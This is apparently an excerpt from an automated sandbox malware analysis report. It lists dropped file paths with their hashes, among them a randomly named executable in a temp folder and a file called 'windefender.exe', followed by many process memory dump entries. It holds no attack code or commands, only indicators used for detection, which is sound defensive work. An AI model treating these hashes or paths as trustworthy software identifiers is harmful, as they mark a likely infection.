C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5cae37105d0fe966c159b551f8b7d8d80
SHA1eed670a6c471c3eb6e7b72cc14501dc6cd18a705
SHA256a278ffb1fcf2af431f0634598bce02d1ecb74f4844a506053ce534bc2df0657f
SHA51204145e18fa572fb473608fedaa57eb28d14ea765b787f61650bf2be524f23652cd957a232c056621a3ea5c7696281729c728c80871b2b4d7e09ad37d77e5e437
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD5c9853106b9f889549cd5ac09e90d1754
SHA1847246970cff8d1cbe60ea9011cf6c2a6d90c82a
SHA256c76b3fc81f6e31a65a453fc9e88f56d25c4d38b8eddb8567c22121def2d284d4
SHA512e08316cd269f7a5392eacdd7da14f3de03529cd1558995edacc2aac6d29416baf0ba61a9af47eb603fff0dd21f8be70ba9c6a09f9c34a9d0587611916171de03
-
C:\Windows\System32\GroupPolicy\GPT.INIFilesize
127B
MD57cc972a3480ca0a4792dc3379a763572
SHA1f72eb4124d24f06678052706c542340422307317
SHA25602ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7
-
C:\Windows\System32\GroupPolicy\Machine\Registry.polFilesize
1KB
MD5cdfd60e717a44c2349b553e011958b85
SHA1431136102a6fb52a00e416964d4c27089155f73b
SHA2560ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8
-
C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\UIQRhsq.exeFilesize
6.6MB
MD5f8efb05b940b05fc74801b61b3c0f500
SHA18e3eb6d604f3552d48ebcb385fc2681716b172af
SHA25690c6b16de088ab3f5737bcb599bb9ffd69a28abd149ab986b7fe52ba8bb2f400
SHA512028ea55f06fbfb079673df19e6e6249e3a2107a3d5485586f8c18724bf0a6a996ea5a7e31721bed9f7bf677bbf789c596994601076c66676c92fbd3a94741fff
-
C:\Windows\sylsplvc.exeFilesize
79KB
MD51e8a2ed2e3f35620fb6b8c2a782a57f3
SHA1e924ce6d147ecc8b30b7c7cad02e5c9ae09a743a
SHA2563f16f4550826076b2c8cd7b392ee649aeb06740328658a2d30c3d2002c6b7879
SHA512ce4dc7fdd7f81a7a127d650f9175292b287b4803d815d74b64a4e5125cff66224d75e7ecade1d9c0e42f870bdb49a78e9613b1a49675ab5bc098611b99b49ade
-
C:\Windows\windefender.exeFilesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
\??\pipe\crashpad_1164_DQLQGYQFKAZNTGFIMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1336-2471-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/1336-2547-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/1336-2531-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/1336-2532-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/1336-2529-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/1336-2518-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/1336-2560-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/1336-2543-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/1336-2741-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/1336-2451-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/1336-2479-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/1336-2428-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/1336-2411-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/1336-2463-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/1336-2436-0x0000000000910000-0x0000000001005000-memory.dmpFilesize
7.0MB
-
memory/2200-2499-0x0000000074A70000-0x0000000075220000-memory.dmpFilesize
7.7MB
-
memory/2200-2480-0x0000000006CD0000-0x0000000006CEE000-memory.dmpFilesize
120KB
-
memory/2200-2570-0x0000000005B10000-0x0000000005B20000-memory.dmpFilesize
64KB
-
memory/2200-2296-0x0000000000400000-0x0000000000452000-memory.dmpFilesize
328KB
-
memory/2200-2373-0x0000000005A70000-0x0000000005A7A000-memory.dmpFilesize
40KB
-
memory/2200-2350-0x00000000058E0000-0x0000000005972000-memory.dmpFilesize
584KB
-
memory/2200-2508-0x0000000006E60000-0x0000000006F6A000-memory.dmpFilesize
1.0MB
-
memory/2200-2509-0x0000000006DA0000-0x0000000006DB2000-memory.dmpFilesize
72KB
-
memory/2200-2510-0x0000000006E00000-0x0000000006E3C000-memory.dmpFilesize
240KB
-
memory/2200-2511-0x0000000006F70000-0x0000000006FBC000-memory.dmpFilesize
304KB
-
memory/2200-2340-0x0000000005DF0000-0x0000000006394000-memory.dmpFilesize
5.6MB
-
memory/2200-2434-0x0000000006620000-0x0000000006696000-memory.dmpFilesize
472KB
-
memory/2200-2498-0x0000000007310000-0x0000000007928000-memory.dmpFilesize
6.1MB
-
memory/2244-2472-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/2244-2375-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2431-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2737-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2435-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2297-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2427-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2448-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2542-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/2244-2370-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2544-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/2244-2352-0x0000000000FE0000-0x0000000001748000-memory.dmpFilesize
7.4MB
-
memory/2244-2546-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/2960-2336-0x0000000000400000-0x0000000000648000-memory.dmpFilesize
2.3MB
-
memory/2960-2325-0x0000000000400000-0x0000000000648000-memory.dmpFilesize
2.3MB
-
memory/2960-2351-0x0000000000400000-0x0000000000648000-memory.dmpFilesize
2.3MB
-
memory/3452-2588-0x0000000005110000-0x0000000005120000-memory.dmpFilesize
64KB
-
memory/3452-2601-0x0000000005110000-0x0000000005120000-memory.dmpFilesize
64KB
-
memory/3452-2585-0x0000000005550000-0x0000000005572000-memory.dmpFilesize
136KB
-
memory/3452-2581-0x0000000004F50000-0x0000000004F86000-memory.dmpFilesize
216KB
-
memory/3452-2586-0x0000000074A70000-0x0000000075220000-memory.dmpFilesize
7.7MB
-
memory/3452-2591-0x0000000005E80000-0x0000000005EE6000-memory.dmpFilesize
408KB
-
memory/3452-2582-0x0000000005750000-0x0000000005D78000-memory.dmpFilesize
6.2MB
-
memory/3452-2603-0x0000000006060000-0x00000000063B4000-memory.dmpFilesize
3.3MB
-
memory/3452-2602-0x0000000005FF0000-0x0000000006056000-memory.dmpFilesize
408KB
-
memory/3644-2551-0x0000000000510000-0x0000000000511000-memory.dmpFilesize
4KB
-
memory/4380-2332-0x0000000000D00000-0x0000000000E30000-memory.dmpFilesize
1.2MB
-
memory/4840-2561-0x0000000004040000-0x000000000492B000-memory.dmpFilesize
8.9MB
-
memory/4840-2549-0x0000000003B30000-0x0000000003F31000-memory.dmpFilesize
4.0MB
-
memory/4840-2571-0x0000000000400000-0x0000000001DEE000-memory.dmpFilesize
25.9MB
-
memory/4840-2738-0x0000000000400000-0x0000000001DEE000-memory.dmpFilesize
25.9MB
-
memory/5192-2327-0x0000000000C70000-0x0000000001110000-memory.dmpFilesize
4.6MB
-
memory/5192-2335-0x0000000005A10000-0x0000000005AAC000-memory.dmpFilesize
624KB
-
memory/5192-2339-0x0000000074A70000-0x0000000075220000-memory.dmpFilesize
7.7MB
-
memory/5220-2429-0x00000000037F0000-0x0000000003948000-memory.dmpFilesize
1.3MB
-
memory/5220-2423-0x0000000003630000-0x00000000036EB000-memory.dmpFilesize
748KB
-
memory/5220-2491-0x0000000000400000-0x0000000001AAF000-memory.dmpFilesize
22.7MB
-
memory/5344-2344-0x0000000000740000-0x0000000000852000-memory.dmpFilesize
1.1MB
-
memory/5556-2348-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/5556-2273-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/5720-248-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-397-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-251-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-245-0x00007FFD57BB0000-0x00007FFD57DA5000-memory.dmpFilesize
2.0MB
-
memory/5720-244-0x00007FFD00000000-0x00007FFD00002000-memory.dmpFilesize
8KB
-
memory/5720-246-0x00007FFD00030000-0x00007FFD00031000-memory.dmpFilesize
4KB
-
memory/5720-2661-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-243-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-249-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-250-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-396-0x00007FFD57BB0000-0x00007FFD57DA5000-memory.dmpFilesize
2.0MB
-
memory/5720-424-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-352-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-1262-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-378-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-1371-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-247-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-253-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-1542-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-254-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-271-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5720-252-0x00007FF7CBDE0000-0x00007FF7CC504000-memory.dmpFilesize
7.1MB
-
memory/5748-2464-0x0000000003520000-0x0000000003547000-memory.dmpFilesize
156KB
-
memory/5748-2458-0x0000000001B80000-0x0000000001C80000-memory.dmpFilesize
1024KB
-
memory/5748-2573-0x0000000000400000-0x0000000001A11000-memory.dmpFilesize
22.1MB
-
memory/5748-2514-0x0000000000400000-0x0000000001A11000-memory.dmpFilesize
22.1MB
-
memory/5764-2430-0x0000000002EC0000-0x0000000002EC1000-memory.dmpFilesize
4KB
-
memory/5764-2433-0x00000000005F0000-0x0000000000EE6000-memory.dmpFilesize
9.0MB
-
memory/5764-2559-0x00000000005F0000-0x0000000000EE6000-memory.dmpFilesize
9.0MB
-
memory/5864-2528-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5864-2533-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5916-2572-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5996-2374-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/5996-2739-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2354-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2326-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2386-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/5996-2341-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2349-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2353-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/5996-2371-0x0000000075F80000-0x0000000076070000-memory.dmpFilesize
960KB
-
memory/5996-2372-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2408-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2376-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2426-0x0000000000750000-0x0000000000D1B000-memory.dmpFilesize
5.8MB
-
memory/5996-2449-0x0000000077584000-0x0000000077586000-memory.dmpFilesize
8KB